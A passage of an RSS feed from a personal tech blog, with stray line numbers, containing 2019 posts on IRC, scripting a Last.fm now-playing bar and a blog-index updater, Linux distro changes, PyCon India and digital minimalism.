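    req = urllib.request.Request(url, headers={"User-Agent": "title-bot/0.1"})
    with _opener.open(req, timeout=timeout) as resp:
        if resp.headers.get_content_type() not in ("text/html", "application/xhtml+xml"):
            return None                       # no point scanning a binary for a title
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read(MAX_BYTES)           # bounded read, whatever Content-Length says
    return extract_title(body, charset)


if __name__ == "__main__":
    # usage: python title_fetch.py https://example.com/
    print(fetch_title(sys.argv[1]))
```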
2016
2017<h2 id="in-conclusion">In conclusion</h2>
2018
<p>As the subtitle suggests, using IRC has been great. It’s probably not
for everyone, but it fits my (and Nerdy’s) use case perfectly.</p>
2021
2022<p>P.S.: <em>I’m not sure why the footnotes are reversed.</em></p>
2023
2024<div class="footnotes">
2025<hr />
2026<ol>
2027<li id="fn-modes">
2028<p>Channel modes on <a href="https://wiki.rizon.net/index.php?title=Channel_Modes">Rizon</a>. <a href="#fnref-modes" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
2029</li>
2030
2031<li id="fn-deltachat">
2032<p>It’s in <a href="https://github.com/icyphox/site/issues/10">queue</a>. <a href="#fnref-deltachat" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
2033</li>
2034</ol>
2035</div>
2036]]></description><link>https://icyphox.sh/blog/irc-for-dms</link><pubDate>Sun, 03 Nov 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/irc-for-dms</guid></item><item><title>The intelligence conundrum</title><description><![CDATA[<p>I watched the latest <a href="https://en.wikipedia.org/wiki/S.W.A.T._(2017_TV_series)">S.W.A.T.</a>
2037episode a couple of days ago, and it highlighted some interesting issues that
2038intelligence organizations face when working with law enforcement. Side note: it’s a pretty
2039good show if you like police procedurals.</p>
2040
2041<h2 id="the-problem">The problem</h2>
2042
2043<p>Consider the following scenario:</p>
2044
2045<ul>
2046<li>There’s a local drug lord who’s been recruited to provide intel, by a certain 3-letter organization.</li>
2047<li>Local PD busts his operation and proceed to arrest him.</li>
2048<li>3-letter org steps in, wants him released.</li>
2049</ul>
2050
<p>So here’s the thing: his presence is a threat to the public, but at the same time,
2052he can be a valuable long term asset—giving info on drug inflow, exchanges and perhaps even
2053actionable intel on bigger fish who exist on top of the ladder. But he also
2054seeks security. The 3-letter org must provide him with protection,
2055in case he’s blown. And like in our case, they’d have to step in if he gets arrested.</p>
2056
2057<p>Herein lies the problem. How far should an intelligence organization go to protect an asset?
2058Who matters more, the people they’ve sworn to protect, or the asset?
Because after all, in the bigger picture, local PD and intel orgs are on the same side.</p>
2060
2061<p>Thus, the question arises—how can we measure the “usefulness” of an
2062asset to better quantify the tradeoff that is to be made?
2063Is the intel gained worth the loss of public safety?
2064This question remains largely unanswered, and is quite the
2065predicament should you find yourself in it.</p>
2066
2067<p>This was a fairly short post, but an interesting problem to ponder
2068nonetheless.</p>
2069]]></description><link>https://icyphox.sh/blog/intel-conundrum</link><pubDate>Mon, 28 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/intel-conundrum</guid></item><item><title>Hacky scripts</title><description><![CDATA[<p>As a CS student, I see a lot of people around me doing courses online
2070to learn to code. Don’t get me wrong—it probably works for some.
2071Everyone learns differently. But that’s only going to get you so far.
2072Great you know the syntax, you can solve some competitive programming
2073problems, but that’s not quite enough, is it? The actual learning comes
2074from <em>applying</em> it in solving <em>actual</em> problems—not made up ones.
2075(<em>inb4 some seething CP bro comes at me</em>)</p>
2076
2077<p>Now, what’s an actual problem? Some might define it as real world
2078problems that people out there face, and solving it probably requires
2079building a product. This is what you see in hackathons, generally.</p>
2080
2081<p>If you ask me, however, I like to define it as problems that <em>you</em> yourself
2082face. This could be anything. Heck, it might not even be a “problem”. It
2083could just be an itch that you want to scratch. And this is where
2084<strong>hacky scripts</strong> come in. Unclear? Let me illustrate with a few
2085examples.</p>
2086
2087<h2 id="now-playing-status-in-my-bar">Now playing status in my bar</h2>
2088
2089<p>If you weren’t aware already—I rice my desktop. A lot. And a part of
2090this cohesive experience I try to create involves a status bar up at the
2091top of my screen, showing the time, date, volume and battery statuses etc.</p>
2092
2093<p>So here’s the “problem”. I wanted to have my currently playing song
2094(Spotify), show up on my bar. How did I approach this? A few ideas
2095popped up in my head:</p>
2096
2097<ul>
2098<li>Send <code>playerctl</code>’s STDOUT into my bar</li>
2099<li>Write a Python script to query Spotify’s API</li>
2100<li>Write a Python/shell script to query Last.fm’s API</li>
2101</ul>
2102
2103<p>The first approach bombed instantly. <code>playerctl</code> didn’t recognize my
2104Spotify client and whined about some <code>dbus</code> issues to top it off.
2105I spent a while in that rabbit hole but eventually gave up.</p>
2106
2107<p>My next avenue was the Spotify Web API. One look at the <a href="https://developer.spotify.com/documentation/web-api/">docs</a> and
2108I realize that I’ll have to make <em>more</em> than one request to fetch the
2109artist and track details. Nope, I need this to work fast.</p>
2110
<p>Last resort—Last.fm’s API. Spoiler alert, this worked. Also, arguably
2112the best choice, since it shows the track status regardless of where
2113the music is being played. Here’s the script in its entirety:</p>
2114
2115<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env bash</span>
2116<span class="c1"># now playing</span>
2117<span class="c1"># requires the last.fm API key</span>
2118
2119<span class="nb">source</span> ~/.lastfm <span class="c1"># `export API_KEY="<key>"`</span>
2120<span class="nv">fg</span><span class="o">=</span><span class="s2">"</span><span class="k">$(</span>xres color15<span class="k">)</span><span class="s2">"</span>
2121<span class="nv">light</span><span class="o">=</span><span class="s2">"</span><span class="k">$(</span>xres color8<span class="k">)</span><span class="s2">"</span>
2122
2123<span class="nv">USER</span><span class="o">=</span><span class="s2">"icyphox"</span>
2124<span class="nv">URL</span><span class="o">=</span><span class="s2">"http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks"</span>
2125<span class="nv">URL</span><span class="o">+=</span><span class="s2">"&user=</span><span class="nv">$USER</span><span class="s2">&api_key=</span><span class="nv">$API_KEY</span><span class="s2">&format=json&limit=1&nowplaying=true"</span>
2126<span class="nv">NOTPLAYING</span><span class="o">=</span><span class="s2">" "</span> <span class="c1"># I like to have it show nothing</span>
2127<span class="nv">RES</span><span class="o">=</span><span class="k">$(</span>curl -s <span class="nv">$URL</span><span class="k">)</span>
2128<span class="nv">NOWPLAYING</span><span class="o">=</span><span class="k">$(</span>jq <span class="s1">'.recenttracks.track[0]."@attr".nowplaying'</span> <span class="o"><<<</span> <span class="s2">"</span><span class="nv">$RES</span><span class="s2">"</span> <span class="p">|</span> tr -d <span class="s1">'"'</span><span class="k">)</span>
2129
2130
2131<span class="k">if</span> <span class="o">[[</span> <span class="s2">"</span><span class="nv">$NOWPLAYING</span><span class="s2">"</span> <span class="o">=</span> <span class="s2">"true"</span> <span class="o">]]</span>
2132<span class="k">then</span>
2133 <span class="nv">TRACK</span><span class="o">=</span><span class="k">$(</span>jq <span class="s1">'.recenttracks.track[0].name'</span> <span class="o"><<<</span> <span class="s2">"</span><span class="nv">$RES</span><span class="s2">"</span> <span class="p">|</span> tr -d <span class="s1">'"'</span><span class="k">)</span>
2134 <span class="nv">ARTIST</span><span class="o">=</span><span class="k">$(</span>jq <span class="s1">'.recenttracks.track[0].artist."#text"'</span> <span class="o"><<<</span> <span class="s2">"</span><span class="nv">$RES</span><span class="s2">"</span> <span class="p">|</span> tr -d <span class="s1">'"'</span><span class="k">)</span>
2135 <span class="nb">echo</span> -ne <span class="s2">"%{F</span><span class="nv">$light</span><span class="s2">}</span><span class="nv">$TRACK</span><span class="s2"> %{F</span><span class="nv">$fg</span><span class="s2">}by </span><span class="nv">$ARTIST</span><span class="s2">"</span>
2136<span class="k">else</span>
2137 <span class="nb">echo</span> -ne <span class="s2">"</span><span class="nv">$NOTPLAYING</span><span class="s2">"</span>
2138<span class="k">fi</span>
2139</code></pre></div>
2140
2141<p>The <code>source</code> command is used to fetch the API key which I store at
2142<code>~/.lastfm</code>. The <code>fg</code> and <code>light</code> variables can be ignored, they’re only
2143for coloring output on my bar. The rest is fairly trivial and just
2144involves JSON parsing with <a href="https://stedolan.github.io/jq/"><code>jq</code></a>.
2145That’s it! It’s so small, but I learnt a ton. For those curious, here’s
2146what it looks like running:</p>
2147
2148<p><img src="/static/img/now_playing.png" alt="now playing status polybar" /></p>
2149
2150<h2 id="update-latest-post-on-the-index-page">Update latest post on the index page</h2>
2151
2152<p>This pertains to this very blog that you’re reading. I wanted a quick
2153way to update the “latest post” section in the home page and the
2154<a href="/blog">blog</a> listing, with a link to the latest post. This would require
2155editing the Markdown <a href="https://github.com/icyphox/site/tree/master/pages">source</a>
2156of both pages.</p>
2157
2158<p>This was a very
2159interesting challenge to me, primarily because it requires in-place
2160editing of the file, not just appending. Sure, I could’ve come up with
2161some <code>sed</code> one-liner, but that didn’t seem very fun. Also I hate
2162regexes. Did a lot of research (read: Googling) on in-place editing of
2163files in Python, sorting lists of files by modification time etc. and
2164this is what I ended up on, ultimately:</p>
2165
2166<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
2167
2168<span class="kn">from</span> <span class="nn">markdown2</span> <span class="kn">import</span> <span class="n">markdown_path</span>
2169<span class="kn">import</span> <span class="nn">os</span>
2170<span class="kn">import</span> <span class="nn">fileinput</span>
2171<span class="kn">import</span> <span class="nn">sys</span>
2172
2173<span class="c1"># change our cwd</span>
2174<span class="n">os</span><span class="o">.</span><span class="n">chdir</span><span class="p">(</span><span class="s2">"bin"</span><span class="p">)</span>
2175
2176<span class="n">blog</span> <span class="o">=</span> <span class="s2">"../pages/blog/"</span>
2177
2178<span class="c1"># get the most recently created file</span>
2179<span class="k">def</span> <span class="nf">getrecent</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
 <span class="n">files</span> <span class="o">=</span> <span class="p">[</span><span class="n">path</span> <span class="o">+</span> <span class="n">f</span> <span class="k">for</span> <span class="n">f</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">path</span><span class="p">)</span> <span class="k">if</span> <span class="n">f</span> <span class="ow">not</span> <span class="ow">in</span> <span class="p">[</span><span class="s2">"_index.md"</span><span class="p">,</span> <span class="s2">"feed.xml"</span><span class="p">]]</span>
2181 <span class="n">files</span><span class="o">.</span><span class="n">sort</span><span class="p">(</span><span class="n">key</span><span class="o">=</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">getmtime</span><span class="p">,</span> <span class="n">reverse</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
2182 <span class="k">return</span> <span class="n">files</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
2183
2184<span class="c1"># adding an entry to the markdown table</span>
2185<span class="k">def</span> <span class="nf">update_index</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
2186 <span class="n">path</span> <span class="o">=</span> <span class="s2">"../pages/_index.md"</span>
2187 <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
2188 <span class="n">md</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">readlines</span><span class="p">()</span>
2189 <span class="n">ruler</span> <span class="o">=</span> <span class="n">md</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s2">"| --- | --: |</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
2190 <span class="n">md</span><span class="p">[</span><span class="n">ruler</span> <span class="o">+</span> <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">s</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span>
2191
2192 <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
2193 <span class="n">f</span><span class="o">.</span><span class="n">writelines</span><span class="p">(</span><span class="n">md</span><span class="p">)</span>
2194
2195<span class="c1"># editing the md source in-place</span>
2196<span class="k">def</span> <span class="nf">update_blog</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
2197 <span class="n">path</span> <span class="o">=</span> <span class="s2">"../pages/blog/_index.md"</span>
2198 <span class="n">s</span> <span class="o">=</span> <span class="n">s</span> <span class="o">+</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">"</span>
2199 <span class="k">for</span> <span class="n">l</span> <span class="ow">in</span> <span class="n">fileinput</span><span class="o">.</span><span class="n">FileInput</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">inplace</span><span class="o">=</span><span class="mi">1</span><span class="p">):</span>
2200 <span class="k">if</span> <span class="s2">"--:"</span> <span class="ow">in</span> <span class="n">l</span><span class="p">:</span>
2201 <span class="n">l</span> <span class="o">=</span> <span class="n">l</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">l</span> <span class="o">+</span> <span class="n">s</span><span class="p">)</span>
 <span class="nb">print</span><span class="p">(</span><span class="n">l</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s2">""</span><span class="p">)</span>
2203
2204
2205<span class="c1"># fetch title and date</span>
2206<span class="n">meta</span> <span class="o">=</span> <span class="n">markdown_path</span><span class="p">(</span><span class="n">getrecent</span><span class="p">(</span><span class="n">blog</span><span class="p">),</span> <span class="n">extras</span><span class="o">=</span><span class="p">[</span><span class="s2">"metadata"</span><span class="p">])</span><span class="o">.</span><span class="n">metadata</span>
2207<span class="n">fname</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">basename</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">splitext</span><span class="p">(</span><span class="n">getrecent</span><span class="p">(</span><span class="n">blog</span><span class="p">))[</span><span class="mi">0</span><span class="p">])</span>
2208<span class="n">url</span> <span class="o">=</span> <span class="s2">"/blog/"</span> <span class="o">+</span> <span class="n">fname</span>
2209<span class="n">line</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">"| [</span><span class="si">{</span><span class="n">meta</span><span class="p">[</span><span class="s1">'title'</span><span class="p">]</span><span class="si">}</span><span class="s2">](</span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="s2">) | `</span><span class="si">{</span><span class="n">meta</span><span class="p">[</span><span class="s1">'date'</span><span class="p">]</span><span class="si">}</span><span class="s2">` |"</span>
2210
2211<span class="n">update_index</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
2212<span class="n">update_blog</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
2213</code></pre></div>
2214
2215<p>I’m going to skip explaining this one out, but in essence, it’s <strong>one
2216massive hack</strong>. And in the end, that’s my point exactly. It’s very
2217hacky, but the sheer amount I learnt by writing this ~50
2218line script can’t be taught anywhere.</p>
2219
2220<p>This was partially how
2221<a href="https://github.com/icyphox/vite">vite</a> was born. It was originally
2222intended to be a script to build my site, but grew into a full-blown
2223Python package. I could’ve just
2224used an off-the-shelf static site generator
2225given that there are <a href="https://staticgen.com">so many</a> of them, but
2226I chose to write one myself.</p>
2227
2228<p>And that just about sums up what I wanted to say. The best and most fun
2229way to learn to code—write hacky scripts. You heard it here.</p>
2230]]></description><link>https://icyphox.sh/blog/hacky-scripts</link><pubDate>Thu, 24 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/hacky-scripts</guid></item><item><title>Status update</title><description><![CDATA[<p>I’ve decided to drop the “Weekly” part of the status update posts, since
2231they were never weekly and—let’s be honest—they aren’t going to be.
2232These posts are, henceforth, just “Status updates”. The date range can
2233be inferred from the post date.</p>
2234
2235<p>That said, here’s what I’ve been up to!</p>
2236
2237<h2 id="void-linux">Void Linux</h2>
2238
2239<p>Yes, I decided to ditch Alpine in favor of Void. Alpine was great,
2240really. The very comfy <code>apk</code>, ultra mnml system… but having to
2241maintain a chroot for my glibc needs was getting way too painful. And
2242the package updates are so slow! Heck, they’re still on kernel 4.xx on
2243their supposed “bleeding” <code>edge</code> repo.</p>
2244
2245<p>So yes, Void Linux it is. Still a very clean system. I’m loving it.
2246I also undervolted my system using <a href="https://github.com/georgewhewell/undervolt"><code>undervolt</code></a>
2247(-95 mV). Can’t say for sure if there’s a noticeable difference in
2248battery life though. I’ll see if I can run some tests.</p>
2249
2250<p>This <em>should</em> be the end of my distro hopping. Hopefully.</p>
2251
2252<h2 id="pycon">PyCon</h2>
2253
2254<p>Yeah yeah, enough already. Read <a href="/blog/pycon-wrap-up">my previous post</a>.</p>
2255
2256<h2 id="this-website">This website</h2>
2257
2258<p>I’ve moved out of GitHub Pages over to Netlify. This isn’t my first time
using Netlify, though. I used to host my old blog, which ran Hugo, there.
2260I was tired of doing this terrible hack to maintain a single repo for
2261both my source (<code>master</code>) and deploy (<code>gh-pages</code>). In essence, here’s
2262what I did:</p>
2263
2264<div class="codehilite"><pre><span></span><code><span class="ch">#!/usr/bin/env bash</span>
2265
2266git push origin master
2267<span class="c1"># push contents of `build/` to the `gh-pages` branch</span>
2268git subtree push --prefix build origin gh-pages
2269</code></pre></div>
2270
2271<p>I can now simply push to <code>master</code>, and Netlify generates a build for me
2272by installing <a href="https://github.com/icyphox/vite">vite</a>, and running <code>vite
2273build</code>. Very pleasant.</p>
2274
2275<h2 id="mnmlwms-status"><code>mnmlwm</code>’s status</h2>
2276
2277<p><a href="https://github.com/minimalwm/minimal">mnmlwm</a>, for those unaware, is my pet project which aims to be a simple
2278window manager written in Nim. I’d taken a break from it for a while
2279because Xlib is such a pain to work with (or I’m just dense). Anyway,
2280I’m planning on getting back to it, with some fresh inspiration from
2281Dylan Araps’ <a href="https://github.com/dylanaraps/sowm">sowm</a>.</p>
2282
2283<h2 id="other">Other</h2>
2284
2285<p>I’ve been reading a lot of manga lately. Finished <em>Kekkon Yubiwa
2286Monogatari</em> (till the latest chapter) and <em>Another</em>, and I’ve just
2287started <em>Kakegurui</em>. I’ll reserve my opinions for when I update the
2288<a href="/reading">reading log</a>.</p>
2289
2290<p>That’s about it, and I’ll see you—definitely not next week.</p>
2291]]></description><link>https://icyphox.sh/blog/2019-10-17</link><pubDate>Wed, 16 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-10-17</guid></item><item><title>PyCon India 2019 wrap-up</title><description><![CDATA[<p>I’m writing this article as I sit in class, back on the grind. Last
2292weekend—Oct 12th and 13th—was PyCon India 2019, in Chennai, India.
2293It was my first PyCon, <em>and</em> my first ever talk at a major conference!
This is an account of all the cool stuff I saw, the people I met and the
2295talks I enjoyed.
2296Forgive the lack of pictures—I prefer living the moment through my
2297eyes. </p>
2298
2299<h2 id="talks">Talks</h2>
2300
2301<p>So much ML! Not that it’s a bad thing, but definitely interesting to
2302note. From what I counted, there were about 17 talks tagged under “Data
2303Science, Machine Learning and AI”. I’d have liked to see more talks
2304discussing security and privacy, but hey, the organizers can only pick
2305from what’s submitted. ;)</p>
2306
2307<p>With that point out of the way, here are some of the talks I really liked:</p>
2308
2309<ul>
2310<li><strong>Python Packaging - where we are and where we’re headed</strong> by <a href="https://twitter.com/pradyunsg">Pradyun</a></li>
2311<li><strong>Micropython: Building a Physical Inventory Search Engine</strong> by <a href="https://twitter.com/stonecharioteer">Vinay</a></li>
2312<li><strong>Ragabot - Music Encoded</strong> by <a href="https://twitter.com/vikipedia">Vikrant</a></li>
2313<li><strong>Let’s Hunt a Memory Leak</strong> by <a href="https://twitter.com/sankeyplus">Sanket</a></li>
2314<li>oh and of course, <a href="https://twitter.com/dabeaz">David Beazley</a>’s closing
2315keynote</li>
2316</ul>
2317
2318<h2 id="my-talk">My talk (!!!)</h2>
2319
2320<p>My good buddy <a href="https://twitter.com/_vologue">Raghav</a> and I spoke about
2321our smart lock security research. Agreed, it might have been less
2322“hardware” and more of a bug on the server-side, but that’s the thing
2323about IoT right? It’s so multi-faceted, and is an amalgamation of so
2324many different hardware and software stacks. But, anyway…</p>
2325
2326<p>I was reassured by folks after the talk that the silence during Q/A was
2327the “good” kind of silence. Was it really? I’ll never know.</p>
2328
2329<h2 id="some-nice-people-i-met">Some nice people I met</h2>
2330
2331<ul>
2332<li><a href="https://twitter.com/abhirathb">Abhirath</a>—A 200 IQ lad. Talked to
2333me about everything from computational biology to the physical
2334implementation of quantum computers.</li>
2335<li><a href="https://twitter.com/meain_">Abin</a>—He recognized me from my
2336<a href="https://reddit.com/r/unixporn">r/unixporn</a> posts, which was pretty
2337awesome.</li>
2338<li><a href="https://twitter.com/h6165">Abhishek</a></li>
2339<li>Pradyun and Vikrant (linked earlier)</li>
2340</ul>
2341
2342<p>And a lot of other people doing really great stuff, whose names I’m
2343forgetting.</p>
2344
2345<h2 id="pictures">Pictures!</h2>
2346
2347<p>It’s not much, and
2348I can’t be bothered to format them like a collage or whatever, so I’ll
2349just dump them here—as is.</p>
2350
2351<p><img src="/static/img/silly_badge.jpg" alt="nice badge" />
2352<img src="/static/img/abhishek_anmol.jpg" alt="awkward smile!" />
2353<img src="/static/img/me_talking.jpg" alt="me talking" />
2354<img src="/static/img/s443_pycon.jpg" alt="s443 @ pycon" /></p>
2355
2356<h2 id="cest-tout">C’est tout</h2>
2357
2358<p>Overall, a great time and a weekend well spent. It was very different
2359from your typical security conference—a lot more <em>chill</em>, if you
2360will. The organizers did a fantastic job and the entire event was put
2361together really well.
2362I don’t have much else to say, but I know for sure that I’ll be
2363there next time.</p>
2364
2365<p>That was PyCon India, 2019.</p>
2366]]></description><link>https://icyphox.sh/blog/pycon-wrap-up</link><pubDate>Tue, 15 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/pycon-wrap-up</guid></item><item><title>Thoughts on digital minimalism</title><description><![CDATA[<p>Ah yes, yet another article on the internet on this beaten to death
2367subject. But this is inherently different, since it’s <em>my</em> opinion on
2368the matter, and <em>my</em> technique(s) to achieve “digital minimalism”.</p>
2369
2370<p>According to me, minimalism can be achieved on two primary fronts –
2371the phone & the computer. Let’s start with the phone. The daily carry.
2372The device that’s on our person from when we get out of bed, till we get
2373back in bed.</p>
2374
2375<h2 id="the-phone">The phone</h2>
2376
2377<p>I’ve read about a lot of methods people employ to curb their phone
2378usage. Some have tried grouping “distracting” apps into a separate
2379folder, and this supposedly helps reduce their usage. Now, I fail to see
2380how this would work, but YMMV. Another technique I see often is using
2381a time governance app—like OnePlus’ Zen Mode—to enforce how much
2382time you spend using specific apps, or the phone itself. I’ve tried this
2383for myself, but I constantly found myself counting down the minutes
2384after which the phone would become usable again. Not helpful.</p>
2385
2386<p>My solution to this is a lot more brutal. I straight up uninstalled the
2387apps that I found myself using too often. There’s a simple principle
2388behind it—if the app has a desktop alternative, like Twitter,
2389Reddit, etc. use that instead. Here’s a list of apps that got nuked from
2390my phone:</p>
2391
2392<ul>
2393<li>Twitter</li>
2394<li>Instagram (an exception, no desktop client)</li>
2395<li>Relay for Reddit</li>
2396<li>YouTube (disabled, ships with stock OOS)</li>
2397</ul>
2398
2399<p>The only non-productive app that I’ve let remain is Clover,
2400a 4chan client. I didn’t find myself using it as much earlier, but we’ll see how that
2401holds up. I’ve also allowed my personal messaging apps to remain, since
2402removing those would be inconveniencing others.</p>
2403
2404<p>I must admit, I often find myself reaching for my phone out of habit
2405just to check Twitter, only to find that it’s gone. I also subconsciously
2406tap the place where its icon used to exist (now replaced with my mail
2407client) on my launcher. The only “fun” thing left on my phone to do is
2408read or listen to music. Which is okay, in my opinion.</p>
2409
2410<h2 id="the-computer">The computer</h2>
2411
2412<p>I didn’t do anything too nutty here, and most of the minimalism is
2413mostly aesthetic. I like UIs that get out of the way. </p>
2414
2415<p>My setup right now is just a simple bar at the top showing the time,
2416date, current volume and battery %, along with my workspace indicators.
2417No fancy colors, no flashy buttons and sliders. And that’s it. I don’t
2418try to force myself to not use stuff—after all, I’ve reduced it
2419elsewhere. :)</p>
2420
2421<p>Now the question arises: Is this just a phase, or will I stick to it?
2422What’s going to stop me from heading over to the Play Store and
2423installing those apps back? Well, I never said this was going to be
2424easy. There’s definitely some willpower needed to pull this off.
2425I guess time will tell.</p>
2426]]></description><link>https://icyphox.sh/blog/digital-minimalism</link><pubDate>Sat, 05 Oct 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/digital-minimalism</guid></item><item><title>Weekly status update, 09/17–09/27</title><description><![CDATA[<p>It’s a lazy Friday afternoon here; yet another off day this week thanks to my
2427uni’s fest. My last “weekly” update was 10 days ago, and a lot has happened
2428since then. Let’s get right into it!</p>
2429
2430<h2 id="my-switch-to-alpine">My switch to Alpine</h2>
2431
2432<p>Previously, I ran Debian with Buster/Sid repos, and ever since this happened</p>
2433
2434<div class="codehilite"><pre><span></span><code>$ dpkg --list <span class="p">|</span> wc -l
2435<span class="m">3817</span>
2436
2437<span class="c1"># or something in that ballpark</span>
2438</code></pre></div>
2439
2440<p>I’ve been wanting to reduce my system’s package count.</p>
2441
2442<p>Thus, I began my search for a smaller, simpler and lighter distro with a fairly
2443sane package manager. I did come across Dylan Araps’
2444<a href="https://getkiss.org">KISS Linux</a> project, but it seemed a little too hands-on
2445for me (and still relatively new). I finally settled on
2446<a href="https://alpinelinux.org">Alpine Linux</a>. According to their website:</p>
2447
2448<blockquote>
2449 <p>Alpine Linux is a security-oriented, lightweight Linux distribution based
2450 on musl libc and busybox.</p>
2451</blockquote>
2452
2453<p>The installation was a breeze, and I was quite surprised to see WiFi working
2454OOTB. In the past week of my using this distro, the only major hassle I faced
2455was getting my Minecraft launcher to run. The JRE isn’t fully ported to <code>musl</code>
2456yet.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup> The solution to that is fairly trivial and I plan to write about it
2457soon. (hint: it involves chroots)</p>
2458
2459<p><img src="/static/img/rice-2019-09-27.png" alt="rice" /></p>
2460
2461<h2 id="packaging-for-alpine">Packaging for Alpine</h2>
2462
2463<p>On a related note, I’ve been busy packaging some of the stuff I use for Alpine
2464– you can see my personal <a href="https://github.com/icyphox/aports">aports</a>
2465repository if you’re interested. I’m currently working on packaging Nim too, so
2466keep an eye out for that in the coming week.</p>
2467
2468<h2 id="talk-selection-at-pycon-india">Talk selection at PyCon India!</h2>
2469
2470<p>Yes! My buddy Raghav (<a href="https://twitter.com/_vologue">@_vologue</a>) and I are
2471going to be speaking at PyCon India about our recent smart lock security
2472research. The conference is happening in Chennai, much to our convenience.
2473If you’re attending too, hit me up on Twitter and we can hang!</p>
2474
2475<h2 id="other">Other</h2>
2476
2477<p>That essentially sums up the <em>technical</em> stuff that I did. My Russian is going
2478strong, my reading however, hasn’t. I have <em>yet</em> to finish those books! This
2479week, for sure.</p>
2480
2481<p>Musically, I’ve been experimenting. I tried a bit of hip-hop and chilltrap, and
2482I think I like it? I still find myself coming back to metalcore/deathcore.
2483Here’s a list of artists I discovered (and liked) recently:</p>
2484
2485<ul>
2486<li><a href="https://www.youtube.com/watch?v=r3uKGwcwGWA">Before I Turn</a></li>
2487<li>生 Conform 死 (couldn’t find any official YouTube video, check Spotify)</li>
2488<li><a href="https://www.youtube.com/watch?v=66eFK1ttdC4">Treehouse Burning</a></li>
2489<li><a href="https://www.youtube.com/watch?v=m-w3XM2PwOY">Lee McKinney</a></li>
2490<li><a href="https://www.youtube.com/watch?v=cUibXK7F3PM">Berried Alive</a> (rediscovered)</li>
2491</ul>
2492
2493<p>That’s it for now, I’ll see you next week!</p>
2494
2495<div class="footnotes">
2496<hr />
2497<ol>
2498<li id="fn-1">
2499<p>The <a href="https://aboullaite.me/protola-alpine-java/">Portola Project</a> <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
2500</li>
2501</ol>
2502</div>
2503]]></description><link>https://icyphox.sh/blog/2019-09-27</link><pubDate>Fri, 27 Sep 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-09-27</guid></item><item><title>Weekly status update, 09/08–09/17</title><description><![CDATA[<p>This is something new I’m trying out, in an effort to write more frequently
2504and to serve as a log of how I’m using my time. In theory, I will write this post
2505every week. I’ll need someone to hold me accountable if I don’t. I have yet to decide on
2506a format for this, but it will probably include a quick summary of the work I did,
2507things I read, IRL stuff, etc.</p>
2508
2509<p>With the meta stuff out of the way, here’s what went down last week!</p>
2510
2511<h2 id="my-discovery-of-the-xxiivv-webring">My discovery of the XXIIVV webring</h2>
2512
2513<p>Did you notice the new fidget-spinner-like logo at the bottom? Click it! It’s a link to
2514the <a href="https://webring.xxiivv.com">XXIIVV webring</a>. I really like the idea of webrings.
2515It creates a small community of sites and enables sharing of traffic among these sites.
2516The XXIIVV webring consists mostly of artists, designers and developers and gosh, some
2517of those sites are beautiful. Mine pales in comparison.</p>
2518
2519<p>The webring also has a <a href="https://github.com/buckket/twtxt">twtxt</a> echo chamber aptly
2520called <a href="https://webring.xxiivv.com/hallway.html">The Hallway</a>. twtxt is a fantastic project
2521and its complexity-to-usefulness ratio greatly impresses me. You can find my personal
2522twtxt feed at <code>/twtxt.txt</code> (root of this site).</p>
2523
2524<p>Which brings me to the next thing I did this/last week.</p>
2525
2526<h2 id="twsh-a-twtxt-client-written-in-bash"><code>twsh</code>: a twtxt client written in Bash</h2>
2527
2528<p>I’m not a fan of the official Python client, because you know, Python is bloat.
2529As an advocate of <em>mnmlsm</em>, I can’t use it in good conscience. Thus, began my
2530authorship of a truly mnml client in pure Bash. You can find it <a href="https://github.com/icyphox/twsh">here</a>.
2531It’s not entirely useable as of yet, but it’s definitely getting there, with the help
2532of <a href="https://nerdypepper.me">@nerdypepper</a>.</p>
2533
2534<h2 id="other">Other</h2>
2535
2536<p>I have been listening to my usual podcasts: Crime Junkie, True Crime Garage,
